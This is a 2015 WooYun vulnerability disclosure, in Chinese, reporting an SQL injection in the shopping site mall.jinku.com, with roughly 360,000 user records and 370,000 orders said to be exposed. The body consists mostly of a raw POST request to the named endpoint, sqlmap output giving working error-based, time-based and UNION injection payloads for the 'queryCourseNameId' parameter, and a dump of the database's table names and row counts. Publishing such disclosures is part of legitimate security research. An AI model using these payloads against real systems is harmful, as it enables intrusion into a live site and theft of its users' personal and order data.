当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154149

漏洞标题:金库网某站存在SQL注入漏洞(36万用户信息和37万订单)

相关厂商:jinku.com

漏洞作者: 路人甲

提交时间:2015-11-19 10:00

修复时间:2015-11-25 09:00

公开时间:2015-11-25 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /goods/goodsType!toSearchGoodsNew.jspx?type=1 HTTP/1.1
Content-Length: 582
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION_COOKIE=11; JSESSIONID=5463DEDEE11F6ACF8EC7BAA20FBE0ECD
Host: mall.jinku.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
isShowOwn=&pageNo=1&queryCourseNameId=1111&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0

1.jpg

2.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: queryCourseNameId (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') AND (SELECT 3373 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3373=3373,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('zxfn'='zxfn&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') AND (SELECT * FROM (SELECT(SLEEP(5)))bAQF) AND ('ADUy'='ADUy&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') UNION ALL SELECT CONCAT(0x71787a7671,0x746257727a4872624e53,0x716a707071)#&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0
---
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: cabbage
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| sys_web_logger | 3141103 |
| study_detail | 2282992 |
| study_record | 1940376 |
| finance_con_record | 1894992 |
| finance_con_record_bak | 1884583 |
| study_sco_7 | 949760 |
| study_sco_5 | 939103 |
| study_sco_1 | 937822 |
| study_sco_2 | 937277 |
| study_sco_6 | 936209 |
| study_sco_4 | 935783 |
| study_sco_9 | 935736 |
| study_sco_3 | 935592 |
| study_sco_8 | 934908 |
| study_sco | 931137 |
| study_sco_bak_1 | 679724 |
| study_sco_bak | 554562 |
| chapter_record | 395504 |
| v_finance_send_ticket | 395157 |
| finance_order | 377426 | //订单
| useraccounts | 362998 |
| userinfo | 362997 | //用户
| users | 362997 | //用户
| testpaper_topic | 254843 |
| finance_recharge | 202852 |
| finance_send_ticket | 192305 |
| study_detail_app | 148818 |
| junkustudyrecord_temp | 128228 |
| usersecures | 126264 |
| usermedals | 122509 |
| shoppinggood | 90965 |
| testpaper_report | 90909 |
| finance_send_ticket_detail | 74242 |
| qz_testpaper_topic | 63428 |
| finance_invoice | 53104 |
| shoppingcart | 36709 |
| userfive | 29145 |
| collects | 25999 |
| new_testpaper_topic | 24660 |
| evaluate | 19346 |
| newoptions | 18810 |
| testpaper_topic_bak | 14907 |
| new_testpaper_report | 14819 |
| qz_testpaper_report | 14771 |
| shoppingparm | 11411 |
| testpaper_report_bak | 6967 |
| sys_web_phone_mes_request_info | 6583 |
| newproblem | 5028 |
| shopping_protocol | 3737 |
| spike_log | 3472 |
| new_testpaper_report_font | 2900 |
| options | 2792 |
| testpaper | 1950 |
| new_testpaper | 1773 |
| testpaper_report_font | 1673 |
| finance_user_record | 1353 |
| newuserfive | 1170 |
| sys_se_role_r_fr | 1121 |
| course_item_credit | 1087 |
| cards | 711 |
| org_buy_cards | 705 |
| problem | 699 |
| l_uo_organization | 616 |
| qz_testpaper | 558 |
| item_file | 433 |
| discount | 419 |
| goods_courseware | 413 |
| study_sco_log | 390 |
| book | 381 |
| goods_course | 372 |
| qz_testpaper_report_font | 351 |
| tgglv_cfp | 320 |
| course | 286 |
| goods | 286 |
| courseflash | 265 |
| goods_files | 265 |
| announce | 244 |
| sys_operation_log | 229 |
| goods_praise | 225 |
| qy_testpaper_topic | 199 |
| tgglv | 181 |
| stages_newproblem | 172 |
| friend_invite | 156 |
| flush_cache | 154 |
| problembox | 150 |
| xingjipm | 141 |
| org_discount | 139 |
| sys_se_function_resource | 134 |
| spikeinfo | 111 |
| testpaper_bak | 108 |
| finance_refund_approval | 102 |
| testpaper_report_font_bak | 98 |
| finance_approval_study | 76 |
| tags | 71 |
| exam_counseling | 64 |
| modular_course | 59 |
| sys_se_user_r_role | 54 |
| sys_se_user | 53 |
| sys_se_user_r_group | 53 |
| vipprice | 52 |
| sys_se_role | 47 |
| sys_se_group_role | 43 |
| finance_apply_study | 38 |
| sys_web_phone_mes_request_lump | 36 |
| typebox_goods | 36 |
| advertis | 35 |
| finance_refund | 33 |
| companyuser | 24 |
| coursetutor | 21 |
| qy_testpaper | 19 |
| modular | 13 |
| typebox | 13 |
| spikemachineinfo | 12 |
| sys_se_group | 12 |
| goodstype | 11 |
| items | 6 |
| l_uo_org_type | 6 |
| solution | 6 |
| machine_info | 5 |
| examtest | 4 |
| heat_sell | 4 |
| seckillprice | 4 |
| other_phone | 3 |
| site_activity | 3 |
| company | 2 |
| infoleft | 2 |
| stages | 2 |
| sys_message | 2 |
| user_msg | 2 |
| sysrefund | 1 |
| typebox_companyusers | 1 |
+--------------------------------+---------+

4.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-25 09:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无